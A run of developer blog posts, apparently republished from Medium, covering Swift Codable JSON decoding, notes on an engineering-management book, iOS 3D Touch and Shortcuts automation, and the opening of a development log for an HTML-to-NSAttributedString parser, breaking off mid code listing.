+ let container = try decoder.container(keyedBy: CodingKeys.self)
+ self.id = try container.decode(Int.self, forKey: .id)
+ self.comment = try container.decode(String.self, forKey: .comment)
+ self.commenter = try container.decode(UserEntity.self, forKey: .commenter)
+
+ //
+ let targetObjectContainer = try container.nestedContainer(keyedBy: PredictKey.self, forKey: .targetObject)
+ let targetObjectType = try targetObjectContainer.decode(String.self, forKey: .type)
+ if targetObjectType == "user" {
+ self.targetObject = try container.decode(UserEntity.self, forKey: .targetObject)
+ } else {
+ self.targetObject = try container.decode(SongEntity.self, forKey: .targetObject)
+ }
+ }
+}
+
The principle is similar, but here we first use nestedContainer
to dive into targetObject
to get the type
and then decide what type targetObject
should be parsed into.
Cast when using:
1
+2
+3
+4
+5
+
if let song = result.targetObject as? Song {
+ print(song)
+} else if let user = result.targetObject as? User {
+ print(user)
+}
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
{
+ "results": [
+ {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com"
+ }
+ ]
+}
+
Combine the nestedUnkeyedContainer
mentioned above with the solution from Scenario 1; you can also use Scenario 1’s a. solution, using Associated Value Enum to store values.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
[
+ {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ {
+ "type": "song",
+ "id": 11
+ }
+]
+
Use decodeIfPresent to decode.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+
{
+ "results": [
+ {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ {
+ "error": "error"
+ },
+ {
+ "type": "song",
+ "id": 19,
+ "name": "Take Me to Find Nightlife"
+ }
+ ]
+}
+
As mentioned earlier, Decodable by default requires all data to be correctly parsed to map the output; sometimes you may encounter unstable data from the backend, providing a long array but with some entries missing fields or having mismatched field types causing decode failures; resulting in the entire package failing and returning nil.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+
struct ResultsEntity: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case results
+ }
+ var results: [SongEntity]
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+ var nestedUnkeyedContainer = try container.nestedUnkeyedContainer(forKey: .results)
+
+ self.results = []
+ while !nestedUnkeyedContainer.isAtEnd {
+ if let song = try? nestedUnkeyedContainer.decode(SongEntity.self) {
+ self.results.append(song)
+ } else {
+ let _ = try nestedUnkeyedContainer.decode(EmptyEntity.self)
+ }
+ }
+ }
+}
+
+struct EmptyEntity: Decodable { }
+
+struct SongEntity: Decodable {
+ var type: String
+ var id: Int
+ var name: String
+}
+
+let jsonString = "{ \"results\": [ { \"type\": \"song\", \"id\": 99, \"name\": \"Thinking of You Under the Stars\" }, { \"error\": \"error\" }, { \"type\": \"song\", \"id\": 19, \"name\": \"Take Me to Find Nightlife\" } ] }"
+let jsonDecoder = JSONDecoder()
+let result = try jsonDecoder.decode(ResultsEntity.self, from: jsonString.data(using: .utf8)!)
+print(result)
+
The solution is similar to Scenario 2’s solution; nestedUnkeyedContainer
iterates through each content and performs try? Decode. If Decode fails, it uses Empty Decode to allow the nestedUnkeyedContainer
’s internal pointer to continue executing.
*This method is somewhat of a workaround because we cannot command
nestedUnkeyedContainer
to skip, andnestedUnkeyedContainer
must successfully decode to continue executing. Therefore, we do it this way. Some in the Swift community have suggested adding moveNext(), but it has not been implemented in the current version.
Here we need to mention what was said at the beginning about the utility of splitting Entity/Model; Entity is solely responsible for JSON String to Entity (Decodable) Mapping; Model initWith Entity, the actual program transmission, operation, and business logic all use Model.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+
struct SongEntity: Decodable {
+ var type: String
+ var id: Int
+ var name: String
+}
+
+class SongModel: NSObject {
+ init(_ entity: SongEntity) {
+ self.type = entity.type
+ self.id = entity.id
+ self.name = entity.name
+ }
+
+ var type: String
+ var id: Int
+ var name: String
+
+ var isSave:Bool = false //business logic
+}
+
Benefits of splitting Entity/Model:
List CodingKeys and exclude fields for internal use, give default values during init or set fields with default values or make them Optional, but these are not good methods, just runnable ones.
A complete example combining the basic and advanced usage mentioned above:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+
{
+ "count": 5,
+ "offset": 0,
+ "limit": 10,
+ "results": [
+ {
+ "id": 123456,
+ "comment": "It's Accusefive, not Fiveaccuse!",
+ "target_object": {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars",
+ "create_date": "2020-06-13T15:21:42+0800"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com",
+ "birthday": "1994/07/18"
+ }
+ },
+ {
+ "error": "not found"
+ },
+ {
+ "error": "not found"
+ },
+ {
+ "id": 2,
+ "comment": "Haha, me too!",
+ "target_object": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com",
+ "birthday": "1994/07/18"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 1,
+ "name": "Passerby A",
+ "email": "man@gmail.com",
+ "birthday": "2000/01/12"
+ }
+ }
+ ]
+}
+
Output:
1
+
zhgchgli: It's Accusefive, not Five Accuse!
+
Complete example demonstration as above!
The benefits of choosing to use Codable, first of all, are because it is native, you don’t have to worry about no one maintaining it in the future, and it looks nice when written; but relatively, the restrictions are stricter, it is less flexible in parsing JSON Strings, otherwise, you have to do more things as described in this article to complete it, and the performance is actually not superior to using other Mapping packages (Decodable still uses NSJSONSerialization from the Objective-C era for parsing). However, I think Apple might optimize this in future updates, so we won’t need to change the program then.
The scenarios and examples in the article may be extreme, but sometimes you can’t help it when you encounter them; of course, we hope that in general situations, simple Codable can meet our needs; but with the above techniques, there should be no unsolvable problems!
Thanks to @saiday for technical support.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
“Leading Snowflakes The Engineering Manager Handbook” — Oren Ellenbogen
Entering a management position for the first time can be very confusing; the knowledge about management is only gathered from previous work experience, observations, or casual chats with colleagues, knowing what actions taken by a supervisor are viewed positively or negatively by subordinates. These experiences and thoughts are fragmented, lacking a systematic concept, so I started reading books and recording each author’s experiences. If I encounter similar situations, having this “knowledge confidence” will prevent me from being flustered.
The author, with nearly 20 years of work experience, transitioned from a software engineer to a management position step by step; having served as a Technical Lead and Engineering Manager in both large companies and startups. This book details the bottlenecks encountered when transitioning from an engineer to a management position and the methods to organize and solve them.
I find my background very similar, having originally worked in software development and now exploring management. The key points mentioned in the book have taught me many methods on how to proceed!
- This article is merely personal notes mixed with some personal views. In this age of fragmented information, it is strongly recommended to read the original book to systematically absorb the essence.
- The significance of notes is to make it easier to quickly locate the points you want to review later.
- Some content is directly excerpted from the original text.
The transition from Engineer (Maker) to Manager.
Completing tasks well and even elegantly solving problems is the measure of an excellent engineer, but as a manager, it is no longer measured by the ability to complete tasks, which we have already proven, but by the team goals of leading, driving, and enhancing capabilities.
However, one cannot completely detach from tasks, as completely detaching from task details can lead to disconnection from team members, posing significant risks in terms of execution results, priorities, and trust in the long run.
So, it is not that as a manager you don’t need to do engineering tasks, but rather you need to balance between being an Engineer (Maker) and a Manager.
As engineers, we like to have uninterrupted time to stay in context and solve difficult problems; but as managers, we need to frequently step out to help the team and care for teammates, so interruptions are actually part of a manager’s job.
The author suggests creating two calendars, one as a Maker (engineer) and one as a Manager, and then spending 15-30 minutes every morning to organize thoughts and plan the day’s schedule, including what tasks to do, what meetings to attend, and identifying continuous time slots to solve tasks (as a Maker).
Author’s Calendar Template
The author states that even as managers, we still need to handle tasks; the available focused time is more important to us than before.
The author mentions that during focused time, you can convey to teammates not to disturb you through certain actions!
Methods include: going to a meeting room, wearing headphones, or even buying an ON AIR! switch light to place on your desk.
If it is not an urgent issue, teammates can leave a message or compile information and email it to you, to be addressed after the focused time ends.
Because I can no longer fully dedicate myself to development tasks as I did when I was purely an engineer (Maker), I need to choose tasks that I can personally execute based on the time available in the engineer’s schedule.
Do not become the technical bottleneck of the team. Our mission is to enhance team capabilities, explore new technologies, and improve the company’s technical vision both internally and externally. Tasks can include pre-researching technical issues and sharing them with teammates for execution, resolving the company’s technical debt, improving processes to increase development efficiency, using new technologies, open-sourcing company technology, opening APIs, participating in external hackathons, etc.
The author suggests starting with a 15-20% ratio. Originally, it was 100% as Maker, but now it might be 20% as Maker / 80% as Manager (though this depends on the actual team size and member capabilities; the author also mentions that 50% / 50% is possible). The key is not to be 100% invested in engineering development but to spend more effort on management.
Regularly have 1:1 meetings with teammates to provide mutual feedback and share what you’ve learned.
The author finally mentions that if your management tasks are so overwhelming that you can’t do any engineering (as Maker) work and become disconnected from tasks and technology, you might consider working from home (WFH) a few days a week to isolate yourself from the company or participate in hackathons.
Regularly review the decisions you make as a manager.
As engineers, we have many methods or tools that, if followed, can improve our abilities, such as pair programming, code review, and design patterns. But as managers, especially new ones, we often feel quite lonely.
We don’t want to admit our ignorance to our superiors or subordinates, fear being responsible for the team’s success, and worry about balancing technical debt and business needs.
The author mentions stepping out to seek ways to improve management skills, openly soliciting feedback, and enhancing management skills; being a manager can be as passionate as being an engineer.
Colleagues and bosses are powerful resources we often underestimate. We can quickly learn from their feedback. Establishing a habit of recording and reviewing decisions can help us get better feedback.
The author mentions:
“There is no one right way, there are only tradeoffs.”
I agree. If it weren’t a dilemma, you probably wouldn’t ask. If you ask, it means teammates don’t know how to decide.
We can list options and provide decisions to teammates, but at the same time, we should also note the decisions made.
Sample record sheet provided by the author
Develop the habit of recording and ensure the content is memorable for later.
The author suggests reviewing monthly, sharing and discussing decisions with your boss, other managers, or colleagues (at least half of the issues), and listening to others’ opinions. You can anonymize to protect individuals, focus on issues, not people, and record them.
Regarding the problem:
Regarding the decision:
Encourage teammates to step out of their comfort zones and avoid becoming a jerk or falling into traps.
The author mentions initially feeling uncomfortable because colleagues who were friends now became subordinates. He feared damaging the original relationship, so he took on all the finishing tasks himself. But eventually, he found that the more he protected, the more distant he became from teammates because he kept working hard alone, sharing less, and causing teammates to lose faith.
Looking back, the author says it’s better to express your true thoughts rather than fear hurting teammates’ feelings. “Fear of hurting teammates” is simply a selfish imagination, unnecessary. Moreover, it’s the manager’s responsibility to lead the team to grow and move forward, to see the big picture, and control risks.
Sharing true thoughts is difficult for both sides, but it’s the manager’s responsibility.
We need to show empathy, not sympathy. To make their work truly outstanding, they need our objective opinions.
The author provides the following three points to help balance emotions and behavior:
“If you want to achieve anything in this world, you have to get used to the idea that not everyone will like you.”
If you want to achieve something, you must get used to the fact that not everyone will like your ideas.
Four common pitfalls:
Summary
Spend time writing down ways to motivate teammates and ask supervisors if they are being too protective of the team.
How to complete tasks with lower risk.
Leading by example is a good method. Occasionally participate in the team’s development to demonstrate how to plan and produce good features, showcasing the principles we want to convey. Additionally, focus on explaining the “Why?” (Why do it this way) more than the “How?” (How to do it).
The author mentions a culture of extreme transparency, allowing team members to have complete context, which can enhance decision-making capabilities.
Reducing risk
Delegate tasks while maintaining quality and visibility.
As a manager, you must delegate tasks properly. The author believes that delegation should involve setting expectations and trusting that the assigned teammates have the ability to execute, learn, and have room for mistakes. Managers should also protect teammates from company pressure.
The author uses the following table for recording:
This mainly records tasks that are important to team goals, not daily work.
When deciding whether to delegate a task to a teammate, the author first asks if the task is something only they can do and if it is a managerial task. The second question is whether the task is a long-term leadership task. If neither, then delegate it to a teammate.
For tasks to be delegated, evaluate the teammate’s experience and skills to find the right person.
For the delegation part, we can provide a one-page paper explaining our expectations and simple examples.
Collaboration and mutual understanding between teams.
The author explains that organizations split into many small teams for quick decision-making to accomplish more. Defining the direction of each team is not difficult (e.g., iOS team works on the iOS app), but aligning all teams’ goals is challenging.
The more teams there are, the harder it is to unify everyone’s values, expectations, priorities, and implicit expectations.
We should focus on the reasons and motivations for splitting teams rather than the output, as this can lead to contradictions.
The author believes the following methods can align the direction of each team:
Additionally, here are 5 ways to help teammates build close relationships with other teams:
Summary
“Imagine that someone from Team A drops a feature that Team B needs, due to an urgent support issue. Without communicating this priority change to Team B, trust will be decreased even if it’s a justified priority change.”
“difference between transactional trust and relational/emotional trust”
Build a culture of business learning rather than a culture of building, optimizing throughput, or optimizing value.
Use the AARRR principle for value optimization:
These five aspects are closely related. If Retention is low, adjustments can be made to Referrer and Acquisition simultaneously.
As engineering managers, our job is not just to code or fully immerse ourselves in technology; we should periodically realign with product value.
When the product is in its early market testing phase, focus on optimizing efficiency (quickly solving tasks and releasing) by repeating the following process:
Feature improves Retention -> Release feature -> Learn -> Adjust & repeat.
Evaluate each stage from feature to release for optimization opportunities (spending too much time on design? Discussions?).
Can we invest 20% of the time to reduce 80% of development time? Especially painful points.
Can we experiment or release to the smallest audience first? Avoid large features that end up unused.
“If you can’t make engineering decisions based on data, then make engineering decisions that result in data.”
Although “not implementing this feature will bankrupt the company” is scarier than “this feature will lead to technical debt,” as managers, if we can secure more time to address technical debt, we should do so. We must communicate and manage well.
Optimizing code that might not be used is meaningless.
Track team output (e.g., “01/01/2013–14/01/2013: 2 Large features, 5 Medium features, 4 Small”), and through long-term statistics, provide forecasts.
Identify & resolve bottlenecks:
Since business strategies are constantly changing, we should maintain a more open and flexible mindset towards optimization strategies, with the summary of optimization still focusing on business needs.
About Recruitment.
Start doing the following tasks regularly to prevent a sudden shortage of talent. If you wait until you need people, you’ll have to revert to traditional methods of constant interviewing, which makes it hard to find suitable candidates.
Internal:
External:
Assign the above tasks to team members so everyone contributes to finding good talent.
Building a scalable team.
Creating scalable programs has been our responsibility as engineers, but now the challenge is to build a scalable team.
Unlike programs, people have expectations, needs, and dreams to consider.
The author wants to create a happy work environment where teammates understand task expectations and new challenges, and maintain this enthusiasm.
Define team vision For example, the author’s team is doing web scraping, and their team vision is “To build the largest, most informative profile-database in the world.” Note that this is a vision, not a short-term goal or something you don’t want to do.
Define team core values When selecting core values, ask, “Is this value important enough to fire someone over if they lack it?” Write down the core values and reasons. The author provides the following core values:
Basic expectations:
Personal expectations:
We are a team. Team members have their responsibilities and deliverables, and they must also collaborate with others, help each other, and grow together. Defining expectations is like a contract, transforming the original colleague relationship into a managerial relationship, leading more purposefully. Defining these items is not easy and requires time and patience to iterate.
“You can’t empower people by approving their actions. You empower by designing the need for your approval out of the system.”
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
iOS 3D TOUCH Application
3D Touch functionality has been removed in iPhone 11 and later versions; it has been replaced by Haptic Touch, which is implemented differently.
Some time ago, during a break in project development, I explored many interesting iOS features: CoreML, Vision, Notification Service Extension, Notification Content Extension, Today Extension, Core Spotlight, Share Extension, SiriKit (some have been organized into articles, others are coming soon 🤣)
Among them is today’s main feature: 3D Touch
This feature, supported since iOS 9/iPhone 7, only became useful to me after I upgraded from an iPhone 6 to an iPhone 8!
The first feature is the most widely used and effective (Facebook: content preview in news feed, Line: sneak peek at messages), while the second feature, APP Shortcut Launch, is less commonly used based on data, so it will be discussed last.
As shown in the first image above, the ViewController preview function supports:
Here, we will list the code to implement in A: List View and B: Target View separately:
Since there is no way to determine whether the current view is a preview or an actual entry in B, we first create a Protocol to pass values for judgment:
1
+2
+3
+
protocol UIViewControllerPreviewable {
+ var is3DTouchPreview: Bool { get set }
+}
+
This way, we can make the following judgments in B:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
class BViewController:UIViewController, UIViewControllerPreviewable {
+ var is3DTouchPreview:Bool = false
+ override func viewDidLoad() {
+ super.viewDidLoad()
+ if is3DTouchPreview {
+ // If it is a preview window... for example: full screen, hide the toolbar
+ } else {
+ // Display normally in full mode
+ }
+}
+
A: List window, can be UITableView or UICollectionView:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+
class AViewController:UIViewController {
+ // Register the View that can 3D Touch
+ override func traitCollectionDidChange(_ previousTraitCollection: UITraitCollection?) {
+ super.traitCollectionDidChange(previousTraitCollection)
+ if traitCollection.forceTouchCapability == .available {
+ // TableView:
+ registerForPreviewing(with: self, sourceView: self.TableView)
+ // CollectionView:
+ registerForPreviewing(with: self, sourceView: self.CollectionView)
+ }
+ }
+}
+extension AViewController: UIViewControllerPreviewingDelegate {
+ // Handling after 3D Touch is released
+ func previewingContext(_ previewingContext: UIViewControllerPreviewing, commit viewControllerToCommit: UIViewController) {
+
+ // Now we need to navigate to the page directly, so cancel the preview mode parameter of the ViewController:
+ if var viewControllerToCommit = viewControllerToCommit as? UIViewControllerPreviewable {
+ viewControllerToCommit.is3DTouchPreview = false
+ }
+ self.navigationController?.pushViewController(viewControllerToCommit, animated: true)
+ }
+
+ // Control the position of the 3D Touch Cell, the ViewController to be displayed
+ func previewingContext(_ previewingContext: UIViewControllerPreviewing, viewControllerForLocation location: CGPoint) -> UIViewController? {
+
+ // Get the current indexPath/cell entity
+ // TableView:
+ guard let indexPath = TableView.indexPathForRow(at: location), let cell = TableView.cellForRow(at: indexPath) else { return nil }
+ // CollectionView:
+ guard let indexPath = CollectionView.indexPathForItem(at: location), let cell = CollectionView.cellForItem(at: indexPath) else { return nil }
+
+ // The ViewController to be displayed
+ let targetViewController = UIStoryboard(name: "StoryboardName", bundle: nil).instantiateViewController(withIdentifier: "ViewControllerIdentifier")
+
+ // Retain area when background is blurred (usually the click location), see Figure 1
+ previewingContext.sourceRect = cell.frame
+
+ // 3D Touch window size, default is adaptive, no need to change
+ // To modify, use: targetViewController.preferredContentSize = CGSize(width: 0.0, height: 0.0)
+
+ // Inform the previewing ViewController that it is currently in preview mode:
+ if var targetViewController = targetViewController as? UIViewControllerPreviewable {
+ targetViewController.is3DTouchPreview = true
+ }
+
+ // Returning nil has no effect
+ return nil
+ }
+}
+
Note! The registration of the 3D Touch View should be placed in traitCollectionDidChange instead of “viewDidLoad” ( refer to this content )
I encountered many issues regarding where to place it. Some sources on the internet suggest viewDidLoad, while others suggest cellForItem. However, both places may occasionally fail or cause some cells to malfunction.
Figure 1 Background Blur Reserved Area Diagram
If you need to add an options menu after swiping up, please add it in B. It’s B, B, B!
1
+2
+3
+4
+5
+6
+
override var previewActionItems: [UIPreviewActionItem] {
+ let profileAction = UIPreviewAction(title: "View Merchant Info", style: .default) { (action, viewController) -> Void in
+ // Action after clicking
+ }
+ return [profileAction]
+}
+
Returning an empty array indicates that this feature is not used.
Done!
Add the UIApplicationShortcutItems parameter in info.plist, type Array
And add menu items (Dictionary) within it, with the following Key-Value settings:
Referenced from this article
My settings as shown above
Add the handling function in AppDelegate
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+
func application(_ application: UIApplication, performActionFor shortcutItem: UIApplicationShortcutItem, completionHandler: @escaping (Bool) -> Void) {
+ var info = shortcutItem.userInfo
+
+ switch shortcutItem.type {
+ case "searchShop":
+ //
+ case "topicList":
+ //
+ case "likeWorksPic":
+ //
+ case "marrybarList":
+ //
+ default:
+ break
+ }
+ completionHandler(true)
+}
+
Done!
Adding 3D Touch functionality to the APP is not difficult and users will find it very considerate ❤; it can be combined with design operations to enhance user experience. However, currently, only the two functions mentioned above can be implemented, and since iPhone 6s and below/iPad/iPhone XR do not support 3D Touch, the actual functionalities that can be done are even fewer, mainly serving as an aid to enhance the experience.
If you test carefully enough, you will notice the above effect. When part of the image in the CollectionView has already slid out of the screen, pressing it will result in the above situation 😅
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Automate operations directly using the built-in Shortcuts app on iOS ≥ 13.1
In early July this year, I bought two smart devices: the Mi Home Desk Lamp Pro and the Mi Home LED Smart Desk Lamp. The difference is that one supports HomeKit, and the other only supports Mi Home. At that time, I wrote an article titled “First Experience with Smart Home — Apple HomeKit & Xiaomi Mi Home” which mentioned how to achieve smart functions for leaving and arriving home without HomePod/AppleTV/iPad. The steps were a bit complicated.
This time, with iOS ≥ 13.1 (note that it is only available after 13.1), the built-in “Shortcuts” app (if you can’t find it, please download it from the Store) supports automation. If IFTTT and Mi Home smart devices are used, there’s no need to use third-party apps anymore!
You will receive a shortcut execution notification when entering or leaving the set area, and it will automatically execute upon clicking.
Switch to “My” -> “Smart”
Here, it is assumed that you have already added the device to Mi Home.
Select “Manual Execution”
Here, let me mention why not directly use Mi Home’s “Leave or Arrive at a Place”. First, GPS used in mainland China has deviations which Xiaomi has not corrected. Second, it can only set locations with landmarks on the map, and there are few Taiwan landmarks on the mainland Gaode map.
Scroll down to the “Smart Devices” section, add the devices and actions to be operated
Click “Continue to Add” to add all the devices to be operated
For example, in the “Leave Home” mode, I want to turn off the fan and lights and turn on the camera when leaving home.
Click the top right “Save” and enter the name of this smart operation
Return to the list, click “Add to Siri”
Click “Add to Siri” next to the smart operation you want to add
Input “Command when calling Siri” -> “Add to Siri”
Note! The command must not conflict with built-in iOS commands!
Switch to the “Automation” tab and click the “+” in the upper right corner
If there is no “Automation” tab, please check if your iOS version is higher than 13.1.
Select “Create Personal Automation”
Choose the type “Arrive” or “Leave”
Set “Location”
Search for a location or use the current location, click “Done”
You can set the time range for automatic execution at the bottom, click “Next” in the upper right corner
Since leaving home and arriving home are events that need to be detected all day long, we won’t set a time range for execution here!
Click “Add Action”
Select “Scripting”
Scroll to the “Shortcuts” section, select “Run Shortcut”
Click the “Shortcut” section
Find the “Command when calling Siri” set in Mi Home “Add to Siri”, and select it
Click “Done” in the upper right corner
The newly added automation will appear on the home page!
Done!
When leaving or entering the set address range, the phone or Apple Watch will receive a notification to execute the shortcut, and you can click to execute!
1. There is a 100-meter error in the GPS sensing range
2. The so-called “automation” is just an automatic notification for you to press execute, it does not really execute actions in the background
Execution notification
Click to “Execute”
Please note that it will require unlocking the phone first.
Execution failure will also provide feedback!
Sometimes Mi Home device network issues will cause execution failure.
Click to execute
Unlike the native IFTTT app, the strength lies in its ability to execute notifications on the watch. (IFTTT is purely a notification, you still need to take out your phone to execute)
Using Siri to Execute
Since the Mi Home smart operation scenario has been added to Siri, you can also call Siri to perform actions!
One step closer to a smart life!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
The development log of ZMarkupParser HTML to NSAttributedString rendering engine
Tokenization conversion of HTML String, Normalization processing, generation of Abstract Syntax Tree, application of Visitor Pattern / Builder Pattern, and some miscellaneous discussions…
Last year, I published an article titled “[ TL;DR ] Implementing iOS NSAttributedString HTML Render”, which briefly introduced how to use XMLParser to parse HTML and then convert it into NSAttributedString.Key. The structure and thought process in the article were quite disorganized, as it was a quick record of the issues encountered previously and I did not spend much time researching the topic.
Revisiting this topic, we need to be able to convert the HTML string provided by the API into NSAttributedString and apply the corresponding styles to display it in UITextView/UILabel.
e.g. <b>Test<a>Link</a></b>
should be displayed as Test Link
It is strongly recommended to use Markdown as the string rendering medium language. If your project has the same dilemma as mine and you have no elegant tool to convert HTML to NSAttributedString, please use it.
Friends who remember the previous article can directly jump to the ZhgChgLi / ZMarkupParser section.
The methods for HTML to NSAttributedString found online all suggest directly using NSAttributedString’s built-in options to render HTML, as shown in the example below:
1
+2
+3
+4
+5
+6
+7
+
let htmlString = "<b>Test<a>Link</a></b>"
+let data = htmlString.data(using: String.Encoding.utf8)!
+let attributedOptions:[NSAttributedString.DocumentReadingOptionKey: Any] = [
+ .documentType :NSAttributedString.DocumentType.html,
+ .characterEncoding: String.Encoding.utf8.rawValue
+]
+let attributedString = try! NSAttributedString(data: data, options: attributedOptions, documentAttributes: nil)
+
The problem with this approach:
<Congratulation!>
which will be treated as an HTML tag and removed.The most painful issue for us is the crash problem. From the release of iOS 15 to the fix in 15.2, our app was plagued by this issue. From the data, between 2022/03/11 and 2022/06/08, it caused over 2.4K crashes, affecting over 1.4K users.
This crash issue has existed since iOS 12, and iOS 15 just made it worse. I guess the fix in iOS 15.2 is just a patch, and the official solution cannot completely eradicate it.
The second issue is performance. As a string style Markup Language, it is heavily used in the app’s UILabel/UITextView. As mentioned earlier, one label takes 0.03 seconds, and multiplying this by the number of UILabel/UITextView in a list will cause noticeable lag in user interactions.
The second solution is introduced in the previous article, which uses XMLParser to parse into corresponding NSAttributedString keys and apply styles.
Refer to the implementation of SwiftRichString and the content of the previous article.
The previous article only explored using XMLParser to parse HTML and perform corresponding conversions, completing an experimental implementation, but it did not design it as a well-structured and extensible “tool.”
The problem with this approach:
<br>
/ <Congratulation!>
/ <b>Bold<i>Bold+Italic</b>Italic</i>
These three possible HTML scenarios will cause XMLParser to throw an error and display blank.Neither of the above two solutions can perfectly and elegantly solve the HTML problem, so I started searching for existing solutions.
After searching extensively, I found that the results are similar to the projects mentioned above. There are no giants’ shoulders to stand on.
Without the shoulders of giants, I had to become a giant myself, so I developed an HTML String to NSAttributedString tool.
Developed purely in Swift, it parses HTML Tags using Regex and performs Tokenization, analyzing and correcting Tag accuracy (fixing tags without an end & misplaced tags), then converts it into an abstract syntax tree. Finally, using the Visitor Pattern, it maps HTML Tags to abstract styles to get the final NSAttributedString result; it does not rely on any Parser Lib.
NSAttributedString.DocumentType.html
style="color:red..."
For detailed introduction, installation, and usage, refer to this article: ZMarkupParser HTML String to NSAttributedString Tool
You can directly git clone the project, then open the ZMarkupParser.xcworkspace
Project, select the ZMarkupParser-Demo
Target, and directly Build & Run to try it out.
Now, let’s dive into the technical details of developing this tool.
Overview of the operation process
The above image shows the general operation process, and the following article will introduce it step by step with code examples.
⚠️ This article will simplify Demo Code as much as possible, reduce abstraction and performance considerations, and focus on explaining the operation principles; for the final result, please refer to the project Source Code.
a.k.a parser, parsing
When it comes to HTML rendering, the most important part is parsing. In the past, HTML was parsed as XML using XMLParser; however, it couldn’t handle the fact that HTML usage is not 100% XML, causing parser errors and inability to dynamically correct them.
After ruling out the use of XMLParser, the only option left in Swift was to use Regex for matching and parsing.
Initially, the idea was to use Regex to extract “paired” HTML Tags and recursively find HTML Tags layer by layer until the end; however, this couldn’t solve the problem of nested HTML Tags or support for misplaced tags. Therefore, we changed the strategy to extract “single” HTML Tags, recording whether they are Start Tags, Close Tags, or Self-Closing Tags, and combining other strings into a parsed result array.
Tokenization structure is as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+
enum HTMLParsedResult {
+ case start(StartItem) // <a>
+ case close(CloseItem) // </a>
+ case selfClosing(SelfClosingItem) // <br/>
+ case rawString(NSAttributedString)
+}
+
+extension HTMLParsedResult {
+ class SelfClosingItem {
+ let tagName: String
+ let tagAttributedString: NSAttributedString
+ let attributes: [String: String]?
+
+ init(tagName: String, tagAttributedString: NSAttributedString, attributes: [String : String]?) {
+ self.tagName = tagName
+ self.tagAttributedString = tagAttributedString
+ self.attributes = attributes
+ }
+ }
+
+ class StartItem {
+ let tagName: String
+ let tagAttributedString: NSAttributedString
+ let attributes: [String: String]?
+
+ // Start Tag may be an abnormal HTML Tag or normal text e.g. <Congratulation!>, if found to be an isolated Start Tag after subsequent Normalization, it will be marked as True.
+ var isIsolated: Bool = false
+
+ init(tagName: String, tagAttributedString: NSAttributedString, attributes: [String : String]?) {
+ self.tagName = tagName
+ self.tagAttributedString = tagAttributedString
+ self.attributes = attributes
+ }
+
+ // Used for automatic padding correction in subsequent Normalization
+ func convertToCloseParsedItem() -> CloseItem {
+ return CloseItem(tagName: self.tagName)
+ }
+
+ // Used for automatic padding correction in subsequent Normalization
+ func convertToSelfClosingParsedItem() -> SelfClosingItem {
+ return SelfClosingItem(tagName: self.tagName, tagAttributedString: self.tagAttributedString, attributes: self.attributes)
+ }
+ }
+
+ class CloseItem {
+ let tagName: String
+ init(tagName: String) {
+ self.tagName = tagName
+ }
+ }
+}
+
The regex used is as follows:
1
+
<(?:(?<closeTag>\/)?(?<tagName>[A-Za-z0-9]+)(?<tagAttributes>(?:\s*(\w+)\s*=\s*(["|']).*?\5)*)\s*(?<selfClosingTag>\/)?>)
+
/
a>a
> or , </ a
>href=”https://zhgchg.li” style=”color:red”
>/
>*This regex can still be optimized, will do it later.
Additional information about regex is provided in the latter part of the article, interested friends can refer to it.
Combining it all together:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
